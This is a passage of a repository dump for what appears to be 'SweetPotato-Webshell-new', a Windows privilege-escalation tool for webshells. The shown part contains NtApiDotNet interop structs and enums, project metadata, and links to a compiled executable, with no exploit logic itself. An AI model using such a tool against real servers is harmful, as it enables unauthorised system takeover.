        public IntPtr dwUpper; // Pointer-sized opaque value.
    }
}
28 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Security/Native/SecPkgContextStructs.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using System;
16 | using System.Runtime.InteropServices;
17 |
namespace NtApiDotNet.Win32.Security.Native
{
    /// <summary>
    /// Managed layout of the SSPI context attribute structure that carries the
    /// target name the client asked to authenticate to.
    /// </summary>
    /// <remarks>
    /// A server can compare this client-specified target with its own service
    /// name to detect authentication that was relayed from another service.
    /// The field is a raw native pointer: this type neither copies nor frees the
    /// string, so the caller has to read it and release the buffer itself.
    /// </remarks>
    [StructLayout(LayoutKind.Sequential)]
    internal struct SecPkgContext_ClientSpecifiedTarget
    {
        // Pointer to the native target-name string (presumably wide-character; confirm at the call site).
        public IntPtr sTargetName;
    }
}
26 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Security/Native/SecPkgContext_SessionKey.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using System;
16 | using System.Runtime.InteropServices;
17 |
namespace NtApiDotNet.Win32.Security.Native
{
    /// <summary>
    /// Managed layout of the SSPI context attribute structure that returns the
    /// session key of an established security context.
    /// </summary>
    /// <remarks>
    /// The key bytes are secret material held in native memory. This type only
    /// describes the layout; copying exactly <c>SessionKeyLength</c> bytes and
    /// releasing the native buffer are left to the caller. Managed copies of the
    /// key should be cleared when no longer needed.
    /// </remarks>
    [StructLayout(LayoutKind.Sequential)]
    internal struct SecPkgContext_SessionKey
    {
        // Number of bytes available at SessionKey; validate before reading.
        public int SessionKeyLength;
        // Native pointer to the key bytes; not owned or freed by this struct.
        public IntPtr SessionKey;
    }
}
27 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Security/Native/SecPkgInfo.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using NtApiDotNet.Win32.Security.Authentication;
16 | using System.Runtime.InteropServices;
17 |
namespace NtApiDotNet.Win32.Security.Native
{
#pragma warning disable 1591
    /// <summary>
    /// Managed layout of the Unicode SSPI security package description
    /// (capabilities, version, RPC id, maximum token size, name and comment).
    /// </summary>
    /// <remarks>
    /// The string fields are marshalled as wide-character pointers, matching the
    /// <c>CharSet.Unicode</c> layout. <c>cbMaxToken</c> is the package's stated
    /// upper bound for a token, so buffers that receive tokens should be sized
    /// from it rather than from a guessed constant.
    /// </remarks>
    [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
    internal struct SecPkgInfo
    {
        // Capability bit mask of the package.
        public SecPkgCapabilityFlag fCapabilities;
        public short wVersion;
        public short wRPCID;
        // Maximum size, in bytes, of a security token produced by the package.
        public int cbMaxToken;
        [MarshalAs(UnmanagedType.LPWStr)]
        public string Name;
        [MarshalAs(UnmanagedType.LPWStr)]
        public string Comment;
    }
}
34 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Security/Native/SecStatusCode.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
namespace NtApiDotNet.Win32.Security.Native
{
#pragma warning disable 1591
    /// <summary>
    /// SSPI status values for a successful or still-in-progress handshake step.
    /// </summary>
    /// <remarks>
    /// Only the success and "more work needed" codes are named here. Failure
    /// codes are not enumerated, so any other value must be treated as an error
    /// rather than silently ignored.
    /// </remarks>
    internal enum SecStatusCode : uint
    {
        // The call completed; no further legs are required.
        Success = 0,
        // SEC_I_CONTINUE_NEEDED: send the output token and call again with the reply.
        ContinueNeeded = 0x00090312,
        // SEC_I_COMPLETE_NEEDED: the token must be completed before it is sent.
        CompleteNeeded = 0x00090313,
        // SEC_I_COMPLETE_AND_CONTINUE: complete the token, then continue the exchange.
        CompleteAndContinue = 0x00090314,
    }
}
26 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Security/Native/SecWinNtAuthIdentityFlags.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
namespace NtApiDotNet.Win32.Security.Native
{
#pragma warning disable 1591
    /// <summary>
    /// Character-set flag of a native authentication identity structure.
    /// </summary>
    /// <remarks>
    /// The flag has to agree with how the user, domain and password strings were
    /// actually marshalled. A mismatch makes the native side misread the
    /// credential buffers.
    /// </remarks>
    internal enum SecWinNtAuthIdentityFlags
    {
        // Strings are single-byte (ANSI).
        Ansi = 0x1,
        // Strings are UTF-16.
        Unicode = 0x2,
    }
}
24 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Security/Native/SecureStringMarshal.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using System;
16 | using System.Runtime.InteropServices;
17 | using System.Security;
18 |
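namespace NtApiDotNet.Win32.Security.Native
{
#pragma warning disable 1591
    /// <summary>
    /// Pointer-sized wrapper that hands a <see cref="SecureString"/> to native
    /// code as an unmanaged BSTR and wipes and frees that copy on disposal.
    /// </summary>
    /// <remarks>
    /// While an instance is alive the secret exists as plaintext in unmanaged
    /// memory, so keep the lifetime short and always dispose (using/finally).
    /// This is a struct: copying it by value duplicates <c>Ptr</c>, and disposing
    /// one copy leaves the others pointing at freed memory. Dispose exactly one
    /// instance and do not use any copy afterwards.
    /// </remarks>
    [StructLayout(LayoutKind.Sequential)]
    internal struct SecureStringMarshal : IDisposable
    {
        // Unmanaged BSTR holding the decrypted string, or IntPtr.Zero once released.
        public IntPtr Ptr;

        /// <summary>
        /// Copies the secure string into a newly allocated unmanaged BSTR.
        /// </summary>
        /// <param name="s">The secure string to expose to native code.</param>
        public SecureStringMarshal(SecureString s)
        {
            Ptr = Marshal.SecureStringToBSTR(s);
        }

        /// <summary>
        /// Zeroes and frees the BSTR. Calling it again on the same instance is a no-op.
        /// </summary>
        public void Dispose()
        {
            if (Ptr == IntPtr.Zero)
            {
                return;
            }

            // Clear the field before freeing so that a second Dispose on this
            // instance cannot free the same BSTR twice.
            IntPtr bstr = Ptr;
            Ptr = IntPtr.Zero;
            Marshal.ZeroFreeBSTR(bstr);
        }
    }
}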
41 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Security/Native/TOKEN_SOURCE.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2016 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using System;
16 | using System.Runtime.InteropServices;
17 | using System.Text;
18 |
namespace NtApiDotNet.Win32.Security.Native
{
    /// <summary>
    /// Managed layout of a token source: a fixed 8-byte name followed by a LUID.
    /// </summary>
    [StructLayout(LayoutKind.Sequential)]
    internal class TOKEN_SOURCE
    {
        // Always exactly 8 bytes so it marshals as an inline array.
        [MarshalAs(UnmanagedType.ByValArray, SizeConst = 8)]
        public byte[] SourceName;
        public Luid SourceIdentifier;

        /// <summary>
        /// Builds a token source from an ASCII name.
        /// </summary>
        /// <param name="source_name">
        /// Source name. It is encoded as ASCII, then cut to 8 bytes if longer or
        /// zero-padded to 8 bytes if shorter; truncation is silent.
        /// </param>
        public TOKEN_SOURCE(string source_name)
        {
            const int NameLength = 8;

            byte[] encoded = Encoding.ASCII.GetBytes(source_name);
            byte[] fixedName = new byte[NameLength];
            Array.Copy(encoded, fixedName, Math.Min(encoded.Length, NameLength));

            SourceName = fixedName;
            SourceIdentifier = new Luid();
        }
    }
}
36 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Security/Policy/AccountRightLogonType.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
namespace NtApiDotNet.Win32.Security.Policy
{
#pragma warning disable 1591
    /// <summary>
    /// List of account rights. Not the same as privileges.
    /// </summary>
    /// <remarks>
    /// Each member name is the text of a Windows logon right. The first five
    /// grant a logon type and the <c>SeDeny*</c> members are the matching explicit
    /// denials. No numeric values are assigned, so the members are numbered
    /// 0 through 9 in declaration order.
    /// </remarks>
    public enum AccountRightLogonType
    {
        SeInteractiveLogonRight,
        SeNetworkLogonRight,
        SeBatchLogonRight,
        SeServiceLogonRight,
        SeRemoteInteractiveLogonRight,
        SeDenyInteractiveLogonRight,
        SeDenyNetworkLogonRight,
        SeDenyBatchLogonRight,
        SeDenyServiceLogonRight,
        SeDenyRemoteInteractiveLogonRight,
    }
}
35 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Security/Policy/LsaPolicyAccessRights.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using System;
16 |
namespace NtApiDotNet.Win32.Security.Policy
{
    /// <summary>
    /// Access mask bits for an LSA policy handle: the policy-specific rights in
    /// the low bits plus the generic and standard rights taken from
    /// <c>GenericAccessRights</c>.
    /// </summary>
    /// <remarks>
    /// Request only the bits an operation needs. <c>GenericAll</c> and
    /// <c>MaximumAllowed</c> make it hard to tell from an audit record what a
    /// caller intended to do with the policy object.
    /// </remarks>
    [Flags]
    internal enum LsaPolicyAccessRights : uint
    {
        // Policy-specific rights.
        ViewLocalInformation = 0x00000001,
        ViewAuditInformation = 0x00000002,
        GetPrivateInformation = 0x00000004,
        TrustAdmin = 0x00000008,
        CreateAccount = 0x00000010,
        CreateSecret = 0x00000020,
        CreatePrivilege = 0x00000040,
        SetDefaultQuotaLimits = 0x00000080,
        SetAuditRequirements = 0x00000100,
        AuditLogAdmin = 0x00000200,
        ServerAdmin = 0x00000400,
        LookupNames = 0x00000800,
        Notification = 0x00001000,
        // Generic and standard rights, aliased from GenericAccessRights.
        GenericRead = GenericAccessRights.GenericRead,
        GenericWrite = GenericAccessRights.GenericWrite,
        GenericExecute = GenericAccessRights.GenericExecute,
        GenericAll = GenericAccessRights.GenericAll,
        Delete = GenericAccessRights.Delete,
        ReadControl = GenericAccessRights.ReadControl,
        WriteDac = GenericAccessRights.WriteDac,
        WriteOwner = GenericAccessRights.WriteOwner,
        Synchronize = GenericAccessRights.Synchronize,
        MaximumAllowed = GenericAccessRights.MaximumAllowed,
        AccessSystemSecurity = GenericAccessRights.AccessSystemSecurity,
    }
}
48 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/WnfServiceTriggerInformation.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using System;
16 | using System.Linq;
17 |
namespace NtApiDotNet.Win32
{
#pragma warning disable 1591
    /// <summary>
    /// Service trigger information whose first custom data item is read as a
    /// 64-bit WNF state name.
    /// </summary>
    public class WnfServiceTriggerInformation : ServiceTriggerInformation
    {
        /// <summary>
        /// The opened WNF object, or null when the trigger carried no 8-byte
        /// custom data item or the open call yielded no result.
        /// </summary>
        public NtWnf Name { get; }

        /// <summary>
        /// Builds the trigger information and tries to resolve the WNF state name.
        /// </summary>
        /// <param name="trigger">Native trigger description, passed to the base class.</param>
        internal WnfServiceTriggerInformation(SERVICE_TRIGGER trigger)
            : base(trigger)
        {
            var first = CustomData.FirstOrDefault();

            // A state name is exactly eight bytes; anything else leaves Name unset.
            bool hasStateName = first?.RawData?.Length == 8;
            if (hasStateName)
            {
                ulong stateName = BitConverter.ToUInt64(first.RawData, 0);
                // NOTE(review): the meaning of the two boolean arguments is not
                // visible in this file; confirm against NtWnf.Open.
                Name = NtWnf.Open(stateName, true, false).GetResultOrDefault();
            }
        }

        /// <summary>
        /// Returns the base class string form unchanged.
        /// </summary>
        public override string ToString() => base.ToString();
    }
#pragma warning restore
}
44 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/packages.config:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
// General Information about an assembly is controlled through the following
// set of attributes. Change these attribute values to modify the information
// associated with an assembly.
// NOTE(review): title and product read "SharpPotato" although the solution file
// names this project "SweetPotato". These strings are stored in the metadata of
// the built assembly.
[assembly: AssemblyTitle("SharpPotato")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyProduct("SharpPotato")]
[assembly: AssemblyCopyright("Copyright © 2020")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCulture("")]

// Setting ComVisible to false makes the types in this assembly not visible
// to COM components. If you need to access a type in this assembly from
// COM, set the ComVisible attribute to true on that type.
[assembly: ComVisible(false)]

// The following GUID is for the ID of the typelib if this project is exposed to COM.
// It is the same value as the project GUID in the solution file, and it is kept in
// the compiled assembly's metadata, where it can be used to identify builds of
// this project.
[assembly: Guid("1bf9c10f-6f89-4520-9d2e-aaf17d17ba5e")]

// Version information for an assembly consists of the following four values:
//
// Major Version
// Minor Version
// Build Number
// Revision
//
// You can specify all the values or you can default the Build and Revision Numbers
// by using the '*' as shown below:
// [assembly: AssemblyVersion("1.0.*")]
[assembly: AssemblyVersion("1.0.0.0")]
[assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/SweetPotato.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.29509.3
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "SweetPotato", "SweetPotato.csproj", "{1BF9C10F-6F89-4520-9D2E-AAF17D17BA5E}"
7 | EndProject
8 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "NtApiDotNet", "NtApiDotNet\NtApiDotNet.csproj", "{6AEB5004-6093-4C23-AEAE-911D64CACC58}"
9 | EndProject
10 | Global
11 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
12 | Debug|Any CPU = Debug|Any CPU
13 | Release|Any CPU = Release|Any CPU
14 | EndGlobalSection
15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | {1BF9C10F-6F89-4520-9D2E-AAF17D17BA5E}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
17 | {1BF9C10F-6F89-4520-9D2E-AAF17D17BA5E}.Debug|Any CPU.Build.0 = Debug|Any CPU
18 | {1BF9C10F-6F89-4520-9D2E-AAF17D17BA5E}.Release|Any CPU.ActiveCfg = Release|Any CPU
19 | {1BF9C10F-6F89-4520-9D2E-AAF17D17BA5E}.Release|Any CPU.Build.0 = Release|Any CPU
20 | {6AEB5004-6093-4C23-AEAE-911D64CACC58}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
21 | {6AEB5004-6093-4C23-AEAE-911D64CACC58}.Debug|Any CPU.Build.0 = Debug|Any CPU
22 | {6AEB5004-6093-4C23-AEAE-911D64CACC58}.Release|Any CPU.ActiveCfg = Release|Any CPU
23 | {6AEB5004-6093-4C23-AEAE-911D64CACC58}.Release|Any CPU.Build.0 = Release|Any CPU
24 | EndGlobalSection
25 | GlobalSection(SolutionProperties) = preSolution
26 | HideSolutionNode = FALSE
27 | EndGlobalSection
28 | GlobalSection(ExtensibilityGlobals) = postSolution
29 | SolutionGuid = {2BF3BEBF-0E18-43E5-A34F-BC2C9ABDFEDD}
30 | EndGlobalSection
31 | EndGlobal
32 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/app.config:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/app.manifest:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/bin/Release/SweetPotato.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/uknowsec/SweetPotato/b3985df53a2543fee80323ecf68bedf2c17db6eb/SweetPotato-Webshell-new/bin/Release/SweetPotato.exe
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/packages.config:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/packages/Costura.Fody.4.1.0/.signature.p7s:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/uknowsec/SweetPotato/b3985df53a2543fee80323ecf68bedf2c17db6eb/SweetPotato-Webshell-new/packages/Costura.Fody.4.1.0/.signature.p7s
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/packages/Costura.Fody.4.1.0/Costura.Fody.4.1.0.nupkg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/uknowsec/SweetPotato/b3985df53a2543fee80323ecf68bedf2c17db6eb/SweetPotato-Webshell-new/packages/Costura.Fody.4.1.0/Costura.Fody.4.1.0.nupkg
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/packages/Costura.Fody.4.1.0/build/Costura.Fody.props:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/packages/Costura.Fody.4.1.0/lib/net40/Costura.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/uknowsec/SweetPotato/b3985df53a2543fee80323ecf68bedf2c17db6eb/SweetPotato-Webshell-new/packages/Costura.Fody.4.1.0/lib/net40/Costura.dll
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/packages/Costura.Fody.4.1.0/lib/net40/Costura.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | Costura
5 |
6 |
7 |
8 |
9 | Contains methods for interacting with the Costura system.
10 |
11 |
12 |
13 |
14 | Call this to Initialize the Costura system.
15 |
16 |
17 |
18 |
19 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/packages/Costura.Fody.4.1.0/weaver/Costura.Fody.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/uknowsec/SweetPotato/b3985df53a2543fee80323ecf68bedf2c17db6eb/SweetPotato-Webshell-new/packages/Costura.Fody.4.1.0/weaver/Costura.Fody.dll
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/packages/Fody.6.0.0/.signature.p7s:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/uknowsec/SweetPotato/b3985df53a2543fee80323ecf68bedf2c17db6eb/SweetPotato-Webshell-new/packages/Fody.6.0.0/.signature.p7s
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/packages/Fody.6.0.0/Fody.6.0.0.nupkg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/uknowsec/SweetPotato/b3985df53a2543fee80323ecf68bedf2c17db6eb/SweetPotato-Webshell-new/packages/Fody.6.0.0/Fody.6.0.0.nupkg
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/packages/Fody.6.0.0/netclassictask/Fody.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/uknowsec/SweetPotato/b3985df53a2543fee80323ecf68bedf2c17db6eb/SweetPotato-Webshell-new/packages/Fody.6.0.0/netclassictask/Fody.dll
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/packages/Fody.6.0.0/netclassictask/FodyCommon.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/uknowsec/SweetPotato/b3985df53a2543fee80323ecf68bedf2c17db6eb/SweetPotato-Webshell-new/packages/Fody.6.0.0/netclassictask/FodyCommon.dll
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/packages/Fody.6.0.0/netclassictask/FodyHelpers.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/uknowsec/SweetPotato/b3985df53a2543fee80323ecf68bedf2c17db6eb/SweetPotato-Webshell-new/packages/Fody.6.0.0/netclassictask/FodyHelpers.dll
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/packages/Fody.6.0.0/netclassictask/FodyIsolated.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/uknowsec/SweetPotato/b3985df53a2543fee80323ecf68bedf2c17db6eb/SweetPotato-Webshell-new/packages/Fody.6.0.0/netclassictask/FodyIsolated.dll
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/packages/Fody.6.0.0/netclassictask/Mono.Cecil.Pdb.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/uknowsec/SweetPotato/b3985df53a2543fee80323ecf68bedf2c17db6eb/SweetPotato-Webshell-new/packages/Fody.6.0.0/netclassictask/Mono.Cecil.Pdb.dll
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/packages/Fody.6.0.0/netclassictask/Mono.Cecil.Pdb.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/uknowsec/SweetPotato/b3985df53a2543fee80323ecf68bedf2c17db6eb/SweetPotato-Webshell-new/packages/Fody.6.0.0/netclassictask/Mono.Cecil.Pdb.pdb
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/packages/Fody.6.0.0/netclassictask/Mono.Cecil.Rocks.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/uknowsec/SweetPotato/b3985df53a2543fee80323ecf68bedf2c17db6eb/SweetPotato-Webshell-new/packages/Fody.6.0.0/netclassictask/Mono.Cecil.Rocks.dll
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/packages/Fody.6.0.0/netclassictask/Mono.Cecil.Rocks.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/uknowsec/SweetPotato/b3985df53a2543fee80323ecf68bedf2c17db6eb/SweetPotato-Webshell-new/packages/Fody.6.0.0/netclassictask/Mono.Cecil.Rocks.pdb
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/packages/Fody.6.0.0/netclassictask/Mono.Cecil.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/uknowsec/SweetPotato/b3985df53a2543fee80323ecf68bedf2c17db6eb/SweetPotato-Webshell-new/packages/Fody.6.0.0/netclassictask/Mono.Cecil.dll
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/packages/Fody.6.0.0/netclassictask/Mono.Cecil.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/uknowsec/SweetPotato/b3985df53a2543fee80323ecf68bedf2c17db6eb/SweetPotato-Webshell-new/packages/Fody.6.0.0/netclassictask/Mono.Cecil.pdb
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/packages/Fody.6.0.0/netstandardtask/Fody.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/uknowsec/SweetPotato/b3985df53a2543fee80323ecf68bedf2c17db6eb/SweetPotato-Webshell-new/packages/Fody.6.0.0/netstandardtask/Fody.dll
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/packages/Fody.6.0.0/netstandardtask/FodyCommon.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/uknowsec/SweetPotato/b3985df53a2543fee80323ecf68bedf2c17db6eb/SweetPotato-Webshell-new/packages/Fody.6.0.0/netstandardtask/FodyCommon.dll
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/packages/Fody.6.0.0/netstandardtask/FodyHelpers.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/uknowsec/SweetPotato/b3985df53a2543fee80323ecf68bedf2c17db6eb/SweetPotato-Webshell-new/packages/Fody.6.0.0/netstandardtask/FodyHelpers.dll
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/packages/Fody.6.0.0/netstandardtask/FodyIsolated.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/uknowsec/SweetPotato/b3985df53a2543fee80323ecf68bedf2c17db6eb/SweetPotato-Webshell-new/packages/Fody.6.0.0/netstandardtask/FodyIsolated.dll
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/packages/Fody.6.0.0/netstandardtask/Mono.Cecil.Pdb.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/uknowsec/SweetPotato/b3985df53a2543fee80323ecf68bedf2c17db6eb/SweetPotato-Webshell-new/packages/Fody.6.0.0/netstandardtask/Mono.Cecil.Pdb.dll
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/packages/Fody.6.0.0/netstandardtask/Mono.Cecil.Pdb.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/uknowsec/SweetPotato/b3985df53a2543fee80323ecf68bedf2c17db6eb/SweetPotato-Webshell-new/packages/Fody.6.0.0/netstandardtask/Mono.Cecil.Pdb.pdb
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/packages/Fody.6.0.0/netstandardtask/Mono.Cecil.Rocks.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/uknowsec/SweetPotato/b3985df53a2543fee80323ecf68bedf2c17db6eb/SweetPotato-Webshell-new/packages/Fody.6.0.0/netstandardtask/Mono.Cecil.Rocks.dll
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/packages/Fody.6.0.0/netstandardtask/Mono.Cecil.Rocks.pdb:
--------------------------------------------------------------------------------
